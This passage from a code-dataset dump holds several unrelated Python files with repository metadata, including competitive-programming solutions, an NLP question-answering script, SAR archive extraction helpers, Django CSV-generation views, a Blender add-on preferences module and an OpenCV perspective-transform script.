7\r\n\r\nOutput:\r\n6\r\n\r\nEXPLANATION:\r\nThe subsequence of maximum length is {1, 3, 0, 4, 1, 7} with Xor of adjacent indexes as {2,3,4,5,6} (non-decreasing)\r\n\r\nInput:\r\n4\r\n1 20 4 45\r\nOutput:\r\n\r\nInput:\r\n7\r\n45 1 87 2 54 2 1\r\nOutput:\r\n\r\nInput:\r\n9\r\n1 22 4 0 45 2 0 2 3 7\r\nOutput:\r\n\r\nInput:\r\n3\r\n1 10 2\r\nOutput:\r\n\r\nSolution:\r\n\"\"\"\r\nn=int(input())\r\nl=list(map(int,input().split()))\r\na=[]\r\nfor i in range(0,n):\r\n\tfor j in range(i+1,n):\r\n\t\ta.append((l[i]^l[j],(i,j)))\r\n\r\na.sort()\r\ndp=[0]*n\r\nfor i in range(0,len(a)):\r\n\tx=a[i][0]\r\n\tleft,right=a[i][1][0],a[i][1][1]\r\n\tdp[right]=max(dp[left]+1,dp[right])\r\n\r\nprint(max(dp)+1)\r\n","repo_name":"GuhanSGCIT/Trees-and-Graphs-problem","sub_path":"longest size subsequence.py","file_name":"longest size subsequence.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71353841809","text":"\"\"\"\r\nIsaiah Banta\r\nbantaib@whitman.edu\r\n\r\nA simple implementation of a Whitman focused Factoid Question \r\nAnswering program.\r\n\"\"\"\r\n\r\nimport string\r\nimport stanfordnlp as snlp\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport spacy\r\nfrom spacy import displacy\r\nfrom collections import Counter\r\nimport en_core_web_sm\r\n\r\n\r\n# POS tagger declared here as it has a print statement that can't be stopped\r\nnlp_pos = snlp.Pipeline(processors='tokenize,mwt,pos')\r\n\r\n# named entity recognition loaded here\r\nnlp_entity_recog = spacy.load(\"en_core_web_sm\")\r\n\r\n# list of stop words provided by nltk\r\nstop_words = set(stopwords.words('english'))\r\n\r\n# list of wh- words\r\nquestion_signifiers = ['who', 'what', 'when', 'where', 'why', 'how', 'whose']\r\n\r\n# list of question classifications in a hierarchy\r\ndatabase = {'PERSON': [],\r\n 'NORP': [],\r\n 'FAC': [],\r\n 'ORG': [],\r\n 'GPE': [],\r\n 'LOC': [],\r\n 'PRODUCT': [],\r\n 'EVENT': [],\r\n 'WORK_OF_ART': [],\r\n 'LAW': [],\r\n 'LANGUAGE': [],\r\n 'DATE': [],\r\n 'TIME': [],\r\n 'PERCENT': [],\r\n 'MONEY': [],\r\n 'QUANTITY': [],\r\n 'ORDINAL': [],\r\n 'CARDINAL': [],\r\n 'OTHER': []}\r\n\r\n\r\ndef find_key_words(question):\r\n \"\"\"\r\n Returns a list strings of key words in the param question\r\n \"\"\"\r\n\r\n # initiate word lemmatizer\r\n WNL = WordNetLemmatizer()\r\n\r\n # remove punctuation, lower caps, and tokenize\r\n question = question.translate(str.maketrans('', '', string.punctuation)).lower()\r\n \r\n # apply pos and tokenization\r\n doc = nlp_pos(question)\r\n\r\n # filter based on noun phrases and stop words\r\n key_words = []\r\n for sent in doc.sentences:\r\n for word in sent.words:\r\n if word.xpos == 'NNP':\r\n key_words.append(word.text)\r\n continue\r\n if word.text not in stop_words:\r\n key_words.append(word.text)\r\n if word.text != WNL.lemmatize(word.text):\r\n key_words.append(word.text)\r\n\r\n return key_words\r\n\r\n\r\ndef question_classification(question):\r\n \"\"\"\r\n Returns the answer type of the question as a list of strings\r\n I checked the course syllabus to make sure this was allowed:\r\n I built upon github.com/timotito/NLP-Question-Answer-System 's implementation\r\n of their question classification code in their processquestion() function.\r\n \"\"\"\r\n \r\n question = question.lower()\r\n qtokens = word_tokenize(question)\r\n\r\n question_signifier = \"\"\r\n qindx 
= -1\r\n\r\n answer_type = \"\"\r\n\r\n for (indx, word) in enumerate(qtokens):\r\n if word in question_signifiers:\r\n question_signifier = word\r\n qindx = indx\r\n break\r\n\r\n # if no question signifiers found\r\n if qindx < 0:\r\n return 'OTHER'\r\n \r\n # if multiple question signifiers found\r\n if qindx > len(qtokens) - 3:\r\n rest = qtokens[:qindx]\r\n else:\r\n rest = qtokens[qindx+1:]\r\n \r\n answer_type = 'OTHER'\r\n \r\n # if just one then match subsets of question_signifiers list\r\n if question_signifier in ['who', 'whose']:\r\n answer_type = ['PERSON', 'NORP', 'ORG']\r\n if question_signifier == 'what':\r\n answer_type = ['NORP', 'FAC', 'ORG', 'LOC', 'PRODUCT', 'EVENT', 'WORK_OF_ART', 'LAW', 'LANGUAGE', 'DATE', 'TIME', 'QUANTITY']\r\n elif question_signifier == 'where':\r\n answer_type = ['LOC', 'GPE']\r\n elif question_signifier == 'when':\r\n answer_type = ['TIME', 'EVENT', 'DATE']\r\n elif question_signifier == 'how':\r\n if rest[0] in [\"few\", \"little\", \"much\", \"many\", \"large\", \"big\"]:\r\n answer_type = ['PRODUCT', 'PERCENT', 'MONEY', 'QUANTITY', 'ORDINAL', 'CARDINAL']\r\n elif rest[0] in [\"young\", \"old\"]:\r\n answer_type = 'TIME'\r\n elif rest[0] == 'do':\r\n answer_type = ['LAW', 'PERSON']\r\n elif rest[0] == \"long\":\r\n if rest[1] in [\"until\", \"till\", \"before\"]:\r\n answer_type = ['TIME', 'DATE', 'QUANTITY', 'ORDINAL', 'CARDINAL']\r\n elif rest[1] == 'is':\r\n answer_type = ['NUMERIC', 'TIME', 'QUANTITY', 'ORDINAL', 'CARDINAL']\r\n \r\n return answer_type\r\n\r\n\r\ndef populate_database(raw_db):\r\n \"\"\"\r\n Populates the database with sentences from raw_db txt file\r\n that it labels with scapy\r\n \"\"\"\r\n\r\n with open(raw_db, 'r') as file:\r\n data = file.readlines()\r\n\r\n for sentence in data:\r\n \r\n entry = nlp_entity_recog(sentence)\r\n for ent in entry.ents:\r\n database[ent.label_].append(sentence)\r\n\r\n return\r\n\r\n\r\ndef database_lookup(question, keywords, answer_types):\r\n \"\"\"\r\n Looks up sentences in our database with labels given by answer_types\r\n and then gives each of those sentences a score.\r\n \"\"\"\r\n\r\n possible_sentences = []\r\n \r\n # doing an initial filter of the database\r\n for answer_type in answer_types:\r\n for sentence in database[answer_type]:\r\n for keyword in keywords:\r\n if keyword in sentence:\r\n possible_sentences.append(sentence)\r\n \r\n # now doing a simple max keyword hueristic\r\n rankings = []\r\n kw_score = 0\r\n if len(possible_sentences) > 0:\r\n for sentence in possible_sentences:\r\n for keyword in keywords:\r\n if keyword in sentence:\r\n kw_score += 1\r\n \r\n rankings.append([kw_score, sentence])\r\n kw_score = 0\r\n\r\n max_rank = max(rankings)[0] \r\n # removing lower scores\r\n for sentence in rankings:\r\n if sentence[0] < max_rank:\r\n rankings.remove(sentence)\r\n\r\n # computing keyword proximity heuristic\r\n proximity = 0\r\n proximity_total = 0\r\n for sentence in rankings:\r\n tokens = nltk.word_tokenize(sentence[1])\r\n for word in tokens:\r\n if word in keywords and proximity == 0:\r\n proximity += 1\r\n if word in keywords and proximity > 0:\r\n proximity_total += proximity\r\n proximity = 0\r\n if word not in keywords:\r\n proximity += 1\r\n \r\n proximity_total /= len(keywords)\r\n sentence[0] = proximity_total\r\n\r\n min_rank = min(rankings)[0] \r\n # removing higher scores (since lower is better for this heuristic)\r\n for sentence in rankings:\r\n if sentence[0] > min_rank:\r\n rankings.remove(sentence)\r\n \r\n answer = 
min(rankings)\r\n\r\n\r\n return answer[1]\r\n\r\n return \"\"\r\n\r\n\r\ndef get_answer(question, sentence, answer_type):\r\n \"\"\"\r\n Returns the answer to the question given by sentence. \r\n Prints \"Could not find an answer.\" if database lookup returns -1\r\n \"\"\"\r\n if sentence == \"\":\r\n print(\"Answer could not be found!\")\r\n return\r\n else:\r\n print(\"The answer to question: %s is: \" % question)\r\n answer_sent = nlp_entity_recog(sentence)\r\n for ans in answer_sent.ents:\r\n if ans.label_ in answer_type:\r\n print(ans.text)\r\n return\r\n\r\n\r\ndef main():\r\n\r\n populate_database(\"whitman.txt\")\r\n\r\n question1 = \"Who is the President of Whitman College?\"\r\n question2 = \"Where is Whitman College located?\"\r\n\r\n # question 1\r\n keywords = find_key_words(question2)\r\n answer_type = question_classification(question2)\r\n sentence = database_lookup(question2, keywords, answer_type)\r\n get_answer(question2, sentence, answer_type)\r\n\r\n # question 2\r\n keywords = find_key_words(question1)\r\n answer_type = question_classification(question1)\r\n sentence = database_lookup(question1, keywords, answer_type)\r\n get_answer(question1, sentence, answer_type)\r\n \r\n return\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bantaisaiah/Whitman-Factoid-Question-Answering","sub_path":"qanda_system.py","file_name":"qanda_system.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"27211479403","text":"import os, sys\nimport tarfile\nimport shutil\nimport warnings\nimport xml.etree.cElementTree as etree\nfrom shapely.geometry import Polygon, shape\nimport fiona\nimport numpy as np\n\ndef load_shape(shapefile, buffer=0.02):\n # This function creates a shape to make a selection of usable bursts later on. Buffer around shape is in\n # degrees.\n\n if not shapefile:\n warnings.warn('Please provide a shapefile or coordinates.')\n\n try:\n if isinstance(shapefile, list): # If the coordinates are already loaded. (for example bounding box)\n shp = Polygon(shapefile)\n else: # It should be a shape file. 
We always select the first shape.\n sh = next(iter(fiona.open(shapefile)))#.next()\n shp = shape(sh['geometry'])\n\n # Now we have the shape we add a buffer and simplify first to save computation time.\n shp = shp.simplify(buffer / 2)\n shp = shp.buffer(buffer)\n except:\n warnings.warn('Unrecognized shape')\n return\n\n return shp\n\ndef extract_kml_preview(tarred_folder, dir='', kml=True, png=True, overwrite=False):\n # Extracts quicklook and/or .kml files.\n\n if not dir:\n dir = os.path.dirname(tarred_folder)\n \n #base file names\n base_name = os.path.basename(tarred_folder)[:-7]\n first_folder_name = base_name[:13]+'_____'+base_name[18:-4]\n xml_file = first_folder_name+'/'+first_folder_name+'.xml'\n kml_file = first_folder_name+'/SUPPORT/GEARTH_POLY.kml'\n preview_file = first_folder_name+'/PREVIEW/BROWSE.tif'\n \n #new file names\n xml_name = os.path.join(dir, first_folder_name + '.xml')\n kml_name = os.path.join(dir, first_folder_name + '.kml')\n tif_name = os.path.join(dir, first_folder_name + '.tif')\n \n #unzipped file names\n unzipped_xml = os.path.join(dir, xml_file)\n unzipped_kml = os.path.join(dir, kml_file)\n unzipped_tif = os.path.join(dir, preview_file)\n \n #only extract if required\n if not os.path.exists(kml_name) or not os.path.exists(tif_name) or not os.path.exists(xml_name):\n #print('aay')\n my_tar = tarfile.open(tarred_folder)\n my_tar.extract(xml_file, dir)\n my_tar.extract(kml_file, dir)\n my_tar.extract(preview_file, dir)\n my_tar.close()\n \n if not os.path.exists(xml_name) or overwrite == True:\n os.system('cp '+ unzipped_xml +' '+ xml_name)\n if not os.path.exists(kml_name) or overwrite == True:\n os.system('cp '+ unzipped_kml +' '+ kml_name)\n if not os.path.exists(tif_name) or overwrite == True:\n os.system('cp '+ unzipped_tif +' '+ tif_name)\n if os.path.exists(os.path.join(dir, first_folder_name)):\n os.system('rm -rf ' + os.path.join(dir, first_folder_name))\n \n return xml_name, kml_name, tif_name\n\n\ndef shape_im_kml(shp, kml_file):\n # This script extracts a Fiona/polygon shape of the footprint given in the .xml file of the image and checks whether\n # it overlaps\n\n # First check is .kml file exist\n if not os.path.exists(kml_file):\n warnings.warn('.kml file does not exist.')\n return False\n\n try:\n in_kml = etree.parse(kml_file)\n in_kml = in_kml.getroot()\n coor = in_kml[0][3][3][0][0].text\n \n coor = [i.split(',')[:-1] for i in coor.split('\\n')][1:-1]\n \n coverage = Polygon([[float(i[0]),float(i[1])] for i in coor])\n except:\n warnings.warn('.kml file is corrupt')\n return False\n\n if coverage.intersects(shp):\n return True\n else:\n return False\n\n\n\ndef unzip_folder(tarred_folder, dest_folder, overwrite=False, cos_file_name='IMAGE_VV_SRA_strip_009.cos'):\n # Extracts quicklook and/or .kml files.\n\n if not dest_folder:\n dest_folder = os.path.dirname(tarred_folder)\n\n png_name = ''\n kml_name = ''\n \n #base file names\n base_name = os.path.basename(tarred_folder)[:-7]\n first_folder_name = base_name[:13]+'_____'+base_name[18:-4]\n \n cos_file = first_folder_name+'/IMAGEDATA/'+cos_file_name\n xml_file = first_folder_name+'/'+first_folder_name+'.xml'\n #new file names\n cos_d_name = os.path.join(dest_folder, first_folder_name + '.cos')\n xml_file_name = os.path.join(dest_folder, first_folder_name+'.xml')\n \n #unzipped file names\n unzipped_cos = os.path.join(dest_folder, cos_file)\n unzipped_xml = os.path.join(dest_folder, xml_file)\n \n #only extract if required\n #TODO make changes for not xtracting once the data is dumped into 
stack folder\n if not os.path.exists(cos_d_name) and not os.path.exists(xml_file_name):\n my_tar = tarfile.open(tarred_folder)\n my_tar.extract(cos_file, dest_folder)\n my_tar.extract(xml_file, dest_folder)\n my_tar.close()\n \n if not os.path.exists(cos_d_name) or overwrite == True:\n os.system('cp '+ unzipped_cos +' '+ cos_d_name)\n if not os.path.exists(xml_file_name) or overwrite == True:\n os.system('cp '+ unzipped_xml +' '+ xml_file_name)\n if os.path.exists(os.path.join(dest_folder, first_folder_name)):\n os.system('rm -rf ' + os.path.join(dest_folder, first_folder_name))\n \n #return cos_d_name, xml_file_name\n\n\nif __name__=='__main__':\n tarred_folder = sys.argv[1]\n dest_folder = sys.argv[2]\n overwrite = sys.argv[3]\n image_cos_file = sys.argv[4]\n \n if overwrite == 'False':\n overwrite = False\n else:\n overwrite = True\n \n print('tarred folder is ' + tarred_folder)\n print('destination folder is ' + dest_folder)\n \n unzip_folder(tarred_folder, dest_folder, overwrite=overwrite, cos_file_name=image_cos_file)\n","repo_name":"anurag-kulshrestha/PAZ_InSAR","sub_path":"load_shape_unzip.py","file_name":"load_shape_unzip.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"13332599323","text":"import sys\nfrom collections import deque\n\nn, m = map(int, sys.stdin.readline().split())\nqueue = deque([idx for idx in range(1, n + 1)])\n\n\nprint(\"<\", end=\"\")\ncycle = 0\ncnt = 0\nwhile queue:\n value = queue.popleft()\n\n cycle += 1\n if cycle == m:\n cnt += 1\n cycle = 0\n\n if cnt == n:\n print(value, end=\"\")\n else:\n print(value, end=\", \")\n else:\n queue.append(value)\n\nprint(\">\")\n","repo_name":"Meantint/Baekjoon","sub_path":"Silver IV/BOJ_11866/BOJ_11866.py","file_name":"BOJ_11866.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9553380585","text":"import bpy\nfrom bpy.types import AddonPreferences\nfrom bpy.props import StringProperty\nfrom bpy.props import EnumProperty\nfrom platform import system\n\nclass RhubarbAddonPreferences(AddonPreferences):\n bl_idname = __package__\n\n executable_path : StringProperty(\n name=\"Rhubarb lipsync executable\",\n subtype='FILE_PATH',\n default=bpy.utils.user_resource('SCRIPTS', path=\"addons\") + '/blender-rhubarb-lipsync/bin/rhubarb' + ('.exe' if system() == 'Windows' else '')\n )\n\n recognizer : EnumProperty(\n name = \"Recognizer\",\n items = [\n (\"pocketSphinx\", \"pocketSphinx\", \"PocketSphinx is an open-source speech recognition library that generally gives good results for English.\"),\n (\"phonetic\", \"phonetic\", \"This recognizer is language-independent. 
Use it if your recordings are not in English.\")\n ],\n default = \"pocketSphinx\"\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"executable_path\")\n layout.prop(self, \"recognizer\")\n\ndef register():\n bpy.utils.register_class(RhubarbAddonPreferences)\n\n\ndef unregister():\n bpy.utils.unregister_class(RhubarbAddonPreferences)","repo_name":"scaredyfish/blender-rhubarb-lipsync","sub_path":"prefs_blender_rhubarb.py","file_name":"prefs_blender_rhubarb.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"66"} +{"seq_id":"32230295789","text":"from collections import Counter\n\nclass Solution:\n def minIncrementForUnique(self, nums):\n # Time Complexity O(N+M)\n # Space Complexity O(N+M)\n max_val = max(nums)\n count = Counter(nums)\n duplicate = []\n increment = 0\n\n # why the range is len(nums) + max_val ?\n # If all of elements are the same, such as [1, 5, 5]\n # we have to count (3 + 5) - 1 time\n for n in range(len(nums) + max_val):\n # if a number is duplicate in the nums list\n if count[n] >= 2:\n # if there is a duplicate number\n # N duplicate we store the rest of N-1\n duplicate.extend([n] * (count[n] - 1))\n \n # if the duplicate list is not empty, and \n # the count[i] position is not taken yet\n elif duplicate and count[n] == 0:\n # Count the difference between number n and the last element in the duplicate list\n # No matter the order the count the difference, the total difference will be the same.\n # e.g. [1, 5, 7, 4, 4, 3, 1]\n # (2 - 4) + (6 - 1) == (6 - 4) + (2 - 1)\n increment += (n - duplicate.pop())\n \n return increment\n\n def minIncrementForUnique1(self, nums):\n # Time Complexity O(NlogN)\n # Space Complexity O(N)\n nums.sort()\n increment = 0\n for i in range(1, len(nums)):\n pre = nums[i-1]\n cur = nums[i]\n if pre >= cur:\n increment += pre - cur + 1\n nums[i] = pre + 1\n\n return increment","repo_name":"max870701/LeetCodeRecord-Python3-","sub_path":"945-MinIncrementMakeArrayUnique.py","file_name":"945-MinIncrementMakeArrayUnique.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23365772012","text":"from django.views.generic import ListView, View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.template.loader import render_to_string\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import FileResponse, HttpResponseNotAllowed, JsonResponse\nfrom django.forms import formset_factory\nfrom .lib.generator_csv import GeneratorCSV\nfrom .forms import SchemaForm, ColumnForm, CountForm, ColumnFormSet\nfrom .models import Schema, CSV\nfrom . 
import tasks\nimport json\nimport os\n\n# HEROKU_FIX_FILE_CELERY\nfrom django.conf import settings as django_setting\nfrom django.core.files.base import ContentFile\n\n\n# Create your views here.\nclass SchemasView(LoginRequiredMixin, ListView):\n template_name = 'webcsv/schemas.html'\n context_object_name = 'schemas'\n login_url = '/login/'\n redirect_field_name = '/next/'\n allow_empty = True\n\n def get_queryset(self):\n return Schema.objects.filter(user=self.request.user)\n\n def get_context_data(self, *args, **kwargs):\n context_data = super().get_context_data(*args, **kwargs)\n context_data['title'] = 'Schemas'\n return context_data\n\n\n@login_required(login_url='login')\ndef new_schema(request):\n prefix = 'cform'\n if request.method == 'POST':\n schema_form = SchemaForm(data=request.POST)\n SchemaColumnFormSet = formset_factory(form=ColumnForm, can_order=True,\n min_num=1, validate_min=True)\n formset = SchemaColumnFormSet(request.POST, prefix=prefix)\n if schema_form.is_valid():\n current_schema = schema_form.save(commit=False)\n current_schema.user = request.user\n if formset.is_valid():\n current_schema.save()\n for form in formset:\n if form.cleaned_data:\n new_column = form.save(commit=False)\n new_column.schema = current_schema\n new_column.order = form.cleaned_data['ORDER']\n if new_column.datatype in GeneratorCSV.with_extra:\n extra = {}\n datatype_obj = GeneratorCSV.get_datatype_obj(new_column.datatype)\n for param in datatype_obj.extra_params:\n extra[param] = form.cleaned_data[param]\n\n new_column.extra = extra\n\n new_column.save()\n return redirect('webcsv:schemas')\n else:\n schema_form = SchemaForm()\n SchemaColumnFormSet = formset_factory(form=ColumnForm, can_order=True)\n formset = SchemaColumnFormSet(prefix=prefix)\n context = {\n 'title': 'New schema',\n 'schema_form': schema_form,\n 'formset': formset,\n 'with_extra': GeneratorCSV.with_extra,\n 'base_prefix': prefix,\n }\n return render(request, 'webcsv/new_schema.html', context=context)\n\n\n@login_required(login_url='login')\ndef delete_schema(request, schema_id):\n if request.method == 'GET':\n schema_obj = get_object_or_404(Schema, pk=schema_id, user=request.user)\n schema_obj.delete()\n return redirect('webcsv:schemas')\n\n\n@login_required(login_url='login')\ndef edit_schema(request, schema_id):\n prefix = 'cform'\n schema_obj = get_object_or_404(Schema, pk=schema_id, user=request.user)\n\n if request.method == 'POST':\n schema_form = SchemaForm(data=request.POST, instance=schema_obj)\n formset = ColumnFormSet(request.POST, prefix=prefix, instance=schema_obj,\n hide_fields=['DELETE', 'schema', 'id'])\n if schema_form.is_valid():\n schema_form.save()\n if formset.is_valid():\n formset.save()\n return redirect('webcsv:schemas')\n else:\n schema_form = SchemaForm(instance=schema_obj)\n formset = ColumnFormSet(prefix=prefix, instance=schema_obj,\n hide_fields=['DELETE', 'schema', 'id'])\n context = {\n 'title': 'Edit schema',\n 'schema_form': schema_form,\n 'formset': formset,\n 'with_extra': GeneratorCSV.with_extra,\n 'base_prefix': prefix,\n }\n return render(request, 'webcsv/edit_schema.html', context=context)\n\n\nclass SchemaDatasView(LoginRequiredMixin, View):\n login_url = 'login'\n redirect_field_name = 'next'\n\n def get(self, request, schema_id):\n schema_obj = get_object_or_404(Schema, pk=schema_id, user=request.user)\n csvs = schema_obj.csv_set.all()\n form = CountForm(initial={\"count\": 200})\n\n context = {\n 'title': 'Generate csv',\n 'form': form,\n 'schema_obj': schema_obj,\n 'csvs': 
csvs,\n 'status_pending': 'pending',\n }\n return render(request, 'webcsv/csvs.html', context=context)\n\n\n@require_POST\ndef generate_csv(request, schema_id):\n status = {'error_ajax': True, 'result': ''}\n if request.is_ajax():\n try:\n req_data = json.loads(request.body.decode())\n count = int(req_data['count'])\n last_number = int(req_data['lastNumber'])\n\n schema_obj = Schema.objects.get(pk=schema_id)\n csv_obj = CSV.create_fp(schema_obj=schema_obj)\n csv_obj.save()\n\n tasks.create_csv.delay(schema_id, count, csv_obj.pk)\n new_csv_template = render_to_string('webcsv/_csv.html', request=request,\n context={\n 'csv': csv_obj,\n 'status_pending': 'pending',\n 'forloop': {'counter': last_number + 1}})\n response = {\n 'error_ajax': False,\n 'csv_id': csv_obj.id,\n 'status': 'new csv template',\n 'result': new_csv_template,\n }\n return JsonResponse(response)\n except:\n status['status'] = 'Internal error'\n else:\n status['status'] = 'Not allowed method'\n return JsonResponse(status)\n\n\n@require_POST\ndef check_csv(request, schema_id):\n status = {'error_ajax': True, 'result': ''}\n if request.is_ajax():\n try:\n req_data = json.loads(request.body.decode())\n ajax_csv = req_data['pendingCSV']\n if not isinstance(ajax_csv[0], int):\n ajax_csv = list(map(lambda i: int(i), ajax_csv))\n\n csvs_objs = Schema.objects.get(pk=schema_id).csv_set.all()\n\n ready_csv = []\n pending_csv = []\n error_csv = []\n for csv_obj in csvs_objs.filter(pk__in=ajax_csv):\n if csv_obj.ready == True:\n ready_csv.append(csv_obj.id)\n elif csv_obj.ready == False:\n pending_csv.append(csv_obj.id)\n elif csv_obj.ready == None:\n error_csv.append(csv_obj.id)\n\n response = {\n 'error_ajax': False,\n 'status': 'Http ready column',\n 'result': {'ready_csv': ready_csv, 'pending_csv': pending_csv, 'error_csv': error_csv},\n }\n return JsonResponse(response)\n except Exception as e:\n # print(e,type(e))\n status['status'] = 'Internal error'\n else:\n status['status'] = 'Not allowed method'\n return JsonResponse(status)\n\n\n@login_required(login_url='login')\n@require_GET\ndef download_csv(request, csv_id):\n if request.method == 'GET':\n csv_obj = get_object_or_404(CSV, pk=csv_id, schema__user=request.user)\n path = csv_obj.path\n if csv_obj.ready == None:\n return redirect('webcsv:csvs', csv_obj.schema.pk)\n\n if django_setting.HEROKU_FIX_FILE_CELERY:\n try:\n data = tasks.get_file_data.delay(path, csv_id).get(timeout=5)\n if not data:\n raise FileNotFoundError\n except:\n return redirect('webcsv:csvs', csv_obj.schema.pk)\n data = data.encode()\n file_obj = ContentFile(data, name=csv_obj.filename).open('rb')\n else:\n try:\n file_obj = open(path, 'rb')\n except FileNotFoundError:\n csv_obj.ready = None\n csv_obj.save()\n return redirect('webcsv:csvs', csv_obj.schema.pk)\n\n return FileResponse(file_obj, as_attachment=True)\n return HttpResponseNotAllowed(['GET'])\n","repo_name":"nikolxxlyes/csv_django_job","sub_path":"project/webcsv/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72259353491","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nCreated on : 30 Aug 2016\n\nDescription: apply_transform.py\n Apply Perspective transformation on images\n\n Usage:\n\n Example1\n python3 apply_transform.py --image ../images/card.jpg\n --coords \"[(434, 90), (793, 106),(614, 608), (150, 480)]\"\n\n Example2\n python3 apply_transform.py --image ../images/paper.jpg\n --coords 
\"[(152,394),(477,222),(562,330),(205,508)]\"\n\n@ author : sampathsingamsetty\n\"\"\"\n\nfrom transform import fourpoint_transform\nimport numpy as np\nimport argparse\nimport cv2\n\n# argument parsing for the input args\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", help=\"Path to them Image\")\nap.add_argument(\"-c\", \"--coords\", help=\"comma delimited list of source points\")\nargs = vars(ap.parse_args())\n\n# load the image and capture the list of (x, y) points\nimage = cv2.imread(args[\"image\"])\n# supplied coordinates\npoints = np.array(eval(args[\"coords\"]), dtype='float32')\n\n# now apply the 4 point transform to get the \"birds eye view\"\n# of the supplied image\nwarped = fourpoint_transform(image, points)\n\n# display the original and warped image\ncv2.imshow(\"Original Image\", image)\ncv2.imshow(\"Warped Image\", warped)\ncv2.waitKey(0)\n","repo_name":"fpdevil/pycomcv","sub_path":"src/apply_transform.py","file_name":"apply_transform.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"44991416382","text":"from functools import reduce\nfrom timeit import timeit\n\nimport numpy as np\n\n\ndef read_input(filename: str) -> tuple:\n with open(filename, \"r\") as f:\n def to_int(i):\n return 1 if i == \"#\" else 0\n lines = f.read().split(\"\\n\\n\")\n enhancement = np.array(list(map(to_int, list(lines[0]))))\n img = np.array(list(map(lambda x: list(map(to_int, list(x))), lines[1].split(\"\\n\"))))\n return enhancement, img\n\ndef expand_img(img: np.array, expand) -> np.array:\n supplier = np.zeros if expand == 0 else np.ones\n new = supplier((img.shape[0] + 4, img.shape[1] + 4)).astype(int)\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n new[i + 2][j + 2] = img[i][j]\n return new\n\ndef bin_to_int(values: list):\n return reduce(lambda a, b: (a << 1) | b, [0] + values)\n\ndef enhance(enhancement, img, expand):\n img = expand_img(img, expand)\n enhanced_img = np.zeros((img.shape[0] - 2, img.shape[1] - 2)).astype(int)\n for i in range(1, img.shape[0] - 1):\n for j in range(1, img.shape[1] - 1):\n z = img[i - 1:i + 2, j - 1:j + 2].flatten()\n enhanced_img[i - 1][j - 1] = enhancement[bin_to_int(z.tolist())]\n return enhanced_img, enhancement[-expand]\n\n\ndef solve(values: tuple, n: int) -> int:\n enhancement, img = values\n inf_expand = 0\n for i in range(n):\n img, inf_expand = enhance(enhancement, img, inf_expand)\n return sum(sum(img))\n\ndef part_1(values: tuple) -> int:\n return solve(values, 2)\n\n\ndef part_2(values: tuple) -> int:\n return solve(values, 50)\n\n\nif __name__ == '__main__':\n test_input = read_input(\"test_input.txt\")\n assert part_1(test_input) == 35\n assert part_2(test_input) == 3351\n\n my_input = read_input(\"input.txt\")\n print(f\"Part 1: {part_1(my_input)}, Timing: %.2f ms\" % (1000 * timeit(lambda: part_1(my_input), number=1)))\n print(f\"Part 2: {part_2(my_input)}, Timing: %.2f ms\" % (1000 * timeit(lambda: part_2(my_input), number=1)))\n","repo_name":"lukeboxwalker/advent-of-code","sub_path":"year_2021/day_20/puzzle.py","file_name":"puzzle.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18314277497","text":"from __future__ import annotations\nimport json\nimport hashlib\nimport logging\nimport multiprocessing\nfrom multiprocessing.managers import SyncManager\nfrom multiprocessing import Value\nfrom 
ctypes import c_bool\nimport copy\nfrom typing import Any, Callable, Dict, Set, TYPE_CHECKING, List, Optional, Union\nfrom .config import FlatData, HubitBinding, HubitQueryPath, ModelIndexSpecifier\nfrom .tree import LengthTree\nfrom .utils import traverse, reshape, ReadOnlyDict\nfrom operator import itemgetter\n\nfrom .errors import HubitError, HubitWorkerError\n\nif TYPE_CHECKING:\n from .config import HubitModelComponent\n\n\nclass _Worker:\n \"\"\" \"\"\"\n\n RESULTS_FROM_CACHE_ID = \"cache\"\n RESULTS_FROM_CALCULATION_ID = \"calculation\"\n RESULTS_FROM_UNKNOWN = \"unknown\"\n\n def __init__(\n self,\n callback_ready: Callable,\n callback_completed: Callable,\n component: HubitModelComponent,\n query: HubitQueryPath,\n func: Callable,\n version: str,\n tree_for_idxcontext: Dict[str, LengthTree],\n manager: Optional[SyncManager] = None,\n dryrun: bool = False,\n caching: bool = False,\n ):\n \"\"\"\n If inputdata is None the worker cannot work but can still\n render itself and print.\n\n query for one specific location ie no [:]\n query is an internal path (dot-path)\n\n \"\"\"\n self.func = func # function to excecute\n self.id = component.id # name of the component\n self.name = component.name # name of the component\n self.version = version # Version of the component\n self._callback_ready = callback_ready\n self._callback_completed = callback_completed\n self.job = None # For referencing the job if using multiprocessing\n self.query = query\n self.tree_for_idxcontext = tree_for_idxcontext\n self.component = component\n self._consumed_data_set = False\n self._consumed_input_ready = False\n self._consumed_results_ready = False\n self._consumes_input_only = False\n self._results_id: Optional[str] = None\n self.input_checksum: Optional[str] = None\n self.results_checksum: Optional[str] = None\n self.caching = 